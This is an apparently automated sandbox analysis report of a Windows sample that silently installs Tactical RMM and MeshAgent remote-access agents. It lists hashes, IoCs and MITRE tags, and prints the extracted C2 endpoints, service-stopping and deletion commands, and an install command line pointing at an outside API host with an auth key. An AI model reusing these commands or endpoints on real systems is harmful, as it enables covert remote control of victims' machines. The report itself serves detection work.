meshagent | a9fcd874776f3f25782f85303cec11ac2c2e599d05e3d8a3ec3cb5e253bf7d12

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25/01/2025, 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
Size

5.0MB
MD5

4c63b362b73a36e9410738b9f81428ef
SHA1

32824d470f193773e515870c9d3cf8dfa076b2a6
SHA256

a9fcd874776f3f25782f85303cec11ac2c2e599d05e3d8a3ec3cb5e253bf7d12
SHA512

17715f6600d44747bf22f4960256d33b4c3e6eb6192f24ad09207023870182b0c72a14851afb36d99f20e94ca646717a6fd9c7021b12a579a2585f06c0d02b64
SSDEEP

49152:wRg0nHs3wQuuhrb/T8vO90d7HjmAFd4A64nsfJoRLvXW4uyRcH5g3ZCNUgxocMCF:b3wQuu81n256dgxtrE7+eGt

Score

10^/10

meshagent tacticalrmm backdoor defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Family

meshagent

Version

Botnet

TacticalRMM

http://mesh.trmm.v-consulting.com:443/agent.ashx

Attributes

mesh_id
0x79CC638C055FE100C59C9323FA6EBA3DC401BCC6B1C545978FD06AA55AE1B47307B41240C24A067C6BA18464D5E8CDF5
server_id
0F065FD3EA3A2BA9B18DA11DE9E25D6F976A32944350A24CB834A6D1A6EAD7F86F0388FF89786D8F26B5DF45DC73EB03
wss
wss://mesh.trmm.v-consulting.com:443/agent.ashx

Signatures

Detects MeshAgent payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0035000000015d5c-34.dat	family_meshagent

MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	meshagent.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 10 IoCs

pid	Process
2704	tacticalagent-v2.8.0-windows-amd64.exe
3020	tacticalagent-v2.8.0-windows-amd64.tmp
2984	tacticalrmm.exe
2284	tacticalrmm.exe
1444	meshagent.exe
480	Process not Found
2016	MeshAgent.exe
1816	MeshAgent.exe
1212	Process not Found
1200	MeshAgent.exe

Loads dropped DLL 4 IoCs

pid	Process
2704	tacticalagent-v2.8.0-windows-amd64.exe
2932	cmd.exe
2284	tacticalrmm.exe
1212	Process not Found

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\TacticalAgent\agent.log	tacticalrmm.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	meshagent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files\TacticalAgent\unins000.dat	tacticalagent-v2.8.0-windows-amd64.tmp
File opened for modification	C:\Program Files\TacticalAgent\unins000.dat	tacticalagent-v2.8.0-windows-amd64.tmp
File opened for modification	C:\Program Files\TacticalAgent\agent.log	tacticalrmm.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.log	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\TacticalAgent\is-R5NEF.tmp	tacticalagent-v2.8.0-windows-amd64.tmp
File created	C:\Program Files\TacticalAgent\meshagent.exe	tacticalrmm.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Mesh Agent\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files\TacticalAgent\is-7VSD1.tmp	tacticalagent-v2.8.0-windows-amd64.tmp
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2996	sc.exe
3024	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1860	powershell.exe
3000	powershell.exe
2932	powershell.exe
2752	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tacticalagent-v2.8.0-windows-amd64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tacticalagent-v2.8.0-windows-amd64.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2836	cmd.exe
2600	PING.EXE
2560	cmd.exe
696	PING.EXE

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
2980	taskkill.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wmic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wmic.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wmic.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MeshAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 908b957a2d6fdb01	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	MeshAgent.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	tacticalrmm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	tacticalrmm.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2600	PING.EXE
696	PING.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2984	tacticalrmm.exe
2284	tacticalrmm.exe
1860	powershell.exe
3000	powershell.exe
2932	powershell.exe
2752	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	2984	tacticalrmm.exe
Token: SeDebugPrivilege	2284	tacticalrmm.exe
Token: SeAssignPrimaryTokenPrivilege	2324	wmic.exe
Token: SeIncreaseQuotaPrivilege	2324	wmic.exe
Token: SeSecurityPrivilege	2324	wmic.exe
Token: SeTakeOwnershipPrivilege	2324	wmic.exe
Token: SeLoadDriverPrivilege	2324	wmic.exe
Token: SeSystemtimePrivilege	2324	wmic.exe
Token: SeBackupPrivilege	2324	wmic.exe
Token: SeRestorePrivilege	2324	wmic.exe
Token: SeShutdownPrivilege	2324	wmic.exe
Token: SeSystemEnvironmentPrivilege	2324	wmic.exe
Token: SeUndockPrivilege	2324	wmic.exe
Token: SeManageVolumePrivilege	2324	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2324	wmic.exe
Token: SeIncreaseQuotaPrivilege	2324	wmic.exe
Token: SeSecurityPrivilege	2324	wmic.exe
Token: SeTakeOwnershipPrivilege	2324	wmic.exe
Token: SeLoadDriverPrivilege	2324	wmic.exe
Token: SeSystemtimePrivilege	2324	wmic.exe
Token: SeBackupPrivilege	2324	wmic.exe
Token: SeRestorePrivilege	2324	wmic.exe
Token: SeShutdownPrivilege	2324	wmic.exe
Token: SeSystemEnvironmentPrivilege	2324	wmic.exe
Token: SeUndockPrivilege	2324	wmic.exe
Token: SeManageVolumePrivilege	2324	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1056	wmic.exe
Token: SeIncreaseQuotaPrivilege	1056	wmic.exe
Token: SeSecurityPrivilege	1056	wmic.exe
Token: SeTakeOwnershipPrivilege	1056	wmic.exe
Token: SeLoadDriverPrivilege	1056	wmic.exe
Token: SeSystemtimePrivilege	1056	wmic.exe
Token: SeBackupPrivilege	1056	wmic.exe
Token: SeRestorePrivilege	1056	wmic.exe
Token: SeShutdownPrivilege	1056	wmic.exe
Token: SeSystemEnvironmentPrivilege	1056	wmic.exe
Token: SeUndockPrivilege	1056	wmic.exe
Token: SeManageVolumePrivilege	1056	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1056	wmic.exe
Token: SeIncreaseQuotaPrivilege	1056	wmic.exe
Token: SeSecurityPrivilege	1056	wmic.exe
Token: SeTakeOwnershipPrivilege	1056	wmic.exe
Token: SeLoadDriverPrivilege	1056	wmic.exe
Token: SeSystemtimePrivilege	1056	wmic.exe
Token: SeBackupPrivilege	1056	wmic.exe
Token: SeRestorePrivilege	1056	wmic.exe
Token: SeShutdownPrivilege	1056	wmic.exe
Token: SeSystemEnvironmentPrivilege	1056	wmic.exe
Token: SeUndockPrivilege	1056	wmic.exe
Token: SeManageVolumePrivilege	1056	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1568	wmic.exe
Token: SeIncreaseQuotaPrivilege	1568	wmic.exe
Token: SeSecurityPrivilege	1568	wmic.exe
Token: SeTakeOwnershipPrivilege	1568	wmic.exe
Token: SeLoadDriverPrivilege	1568	wmic.exe
Token: SeSystemtimePrivilege	1568	wmic.exe
Token: SeBackupPrivilege	1568	wmic.exe
Token: SeRestorePrivilege	1568	wmic.exe
Token: SeShutdownPrivilege	1568	wmic.exe
Token: SeSystemEnvironmentPrivilege	1568	wmic.exe
Token: SeUndockPrivilege	1568	wmic.exe
Token: SeManageVolumePrivilege	1568	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1568	wmic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3020	tacticalagent-v2.8.0-windows-amd64.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2848 wrote to memory of 2704	2848	2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe	31
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 2704 wrote to memory of 3020	2704	tacticalagent-v2.8.0-windows-amd64.exe	32
PID 3020 wrote to memory of 2836	3020	tacticalagent-v2.8.0-windows-amd64.tmp	33
PID 3020 wrote to memory of 2836	3020	tacticalagent-v2.8.0-windows-amd64.tmp	33
PID 3020 wrote to memory of 2836	3020	tacticalagent-v2.8.0-windows-amd64.tmp	33
PID 3020 wrote to memory of 2836	3020	tacticalagent-v2.8.0-windows-amd64.tmp	33
PID 2836 wrote to memory of 2600	2836	cmd.exe	35
PID 2836 wrote to memory of 2600	2836	cmd.exe	35
PID 2836 wrote to memory of 2600	2836	cmd.exe	35
PID 2836 wrote to memory of 2600	2836	cmd.exe	35
PID 2836 wrote to memory of 2652	2836	cmd.exe	36
PID 2836 wrote to memory of 2652	2836	cmd.exe	36
PID 2836 wrote to memory of 2652	2836	cmd.exe	36
PID 2836 wrote to memory of 2652	2836	cmd.exe	36
PID 2652 wrote to memory of 2660	2652	net.exe	37
PID 2652 wrote to memory of 2660	2652	net.exe	37
PID 2652 wrote to memory of 2660	2652	net.exe	37
PID 2652 wrote to memory of 2660	2652	net.exe	37
PID 3020 wrote to memory of 1984	3020	tacticalagent-v2.8.0-windows-amd64.tmp	38
PID 3020 wrote to memory of 1984	3020	tacticalagent-v2.8.0-windows-amd64.tmp	38
PID 3020 wrote to memory of 1984	3020	tacticalagent-v2.8.0-windows-amd64.tmp	38
PID 3020 wrote to memory of 1984	3020	tacticalagent-v2.8.0-windows-amd64.tmp	38
PID 1984 wrote to memory of 1920	1984	cmd.exe	40
PID 1984 wrote to memory of 1920	1984	cmd.exe	40
PID 1984 wrote to memory of 1920	1984	cmd.exe	40
PID 1984 wrote to memory of 1920	1984	cmd.exe	40
PID 1920 wrote to memory of 2420	1920	net.exe	41
PID 1920 wrote to memory of 2420	1920	net.exe	41
PID 1920 wrote to memory of 2420	1920	net.exe	41
PID 1920 wrote to memory of 2420	1920	net.exe	41
PID 3020 wrote to memory of 2560	3020	tacticalagent-v2.8.0-windows-amd64.tmp	42
PID 3020 wrote to memory of 2560	3020	tacticalagent-v2.8.0-windows-amd64.tmp	42
PID 3020 wrote to memory of 2560	3020	tacticalagent-v2.8.0-windows-amd64.tmp	42
PID 3020 wrote to memory of 2560	3020	tacticalagent-v2.8.0-windows-amd64.tmp	42
PID 2560 wrote to memory of 696	2560	cmd.exe	44
PID 2560 wrote to memory of 696	2560	cmd.exe	44
PID 2560 wrote to memory of 696	2560	cmd.exe	44
PID 2560 wrote to memory of 696	2560	cmd.exe	44
PID 2560 wrote to memory of 884	2560	cmd.exe	45
PID 2560 wrote to memory of 884	2560	cmd.exe	45
PID 2560 wrote to memory of 884	2560	cmd.exe	45
PID 2560 wrote to memory of 884	2560	cmd.exe	45
PID 884 wrote to memory of 796	884	net.exe	46
PID 884 wrote to memory of 796	884	net.exe	46
PID 884 wrote to memory of 796	884	net.exe	46
PID 884 wrote to memory of 796	884	net.exe	46
PID 3020 wrote to memory of 1492	3020	tacticalagent-v2.8.0-windows-amd64.tmp	47
PID 3020 wrote to memory of 1492	3020	tacticalagent-v2.8.0-windows-amd64.tmp	47
PID 3020 wrote to memory of 1492	3020	tacticalagent-v2.8.0-windows-amd64.tmp	47
PID 3020 wrote to memory of 1492	3020	tacticalagent-v2.8.0-windows-amd64.tmp	47
PID 1492 wrote to memory of 2980	1492	cmd.exe	49
PID 1492 wrote to memory of 2980	1492	cmd.exe	49

C:\Users\Admin\AppData\Local\Temp\2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-25_4c63b362b73a36e9410738b9f81428ef_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2848
- C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
  C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Users\Admin\AppData\Local\Temp\is-ML12F.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-ML12F.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$6011C,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2836
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2600
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrpc
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2652
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrpc
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2660
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net stop tacticalagent
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1984
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalagent
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1920
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalagent
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2420
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2560
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:696
    - - C:\Windows\SysWOW64\net.exe
        
        net stop tacticalrmm
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:884
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tacticalrmm
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:796
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM tacticalrmm.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalagent
      4⤵
      System Location Discovery: System Language Discovery
      PID:2360
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalagent
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2996
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c sc delete tacticalrpc
      4⤵
      System Location Discovery: System Language Discovery
      PID:1228
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete tacticalrpc
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3024
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c tacticalrmm.exe -m installsvc
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2932
    - - C:\Program Files\TacticalAgent\tacticalrmm.exe
        
        tacticalrmm.exe -m installsvc
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c net start tacticalrmm
      4⤵
      System Location Discovery: System Language Discovery
      PID:2316
    - - C:\Windows\SysWOW64\net.exe
        
        net start tacticalrmm
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2948
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start tacticalrmm
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2960
- C:\Program Files\TacticalAgent\tacticalrmm.exe
  "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.trmm.v-consulting.com --client-id 6 --site-id 9 --agent-type workstation --auth 5b9472796a1c23bdaf91ebdad8ab4b0ce080e83f3199cdd50bb816e3fa1ddd1e
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- - C:\Program Files\TacticalAgent\meshagent.exe
    "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1444
- - C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
    3⤵
    - Executes dropped EXE
    PID:1816

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2016
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- C:\Windows\system32\wbem\wmic.exe
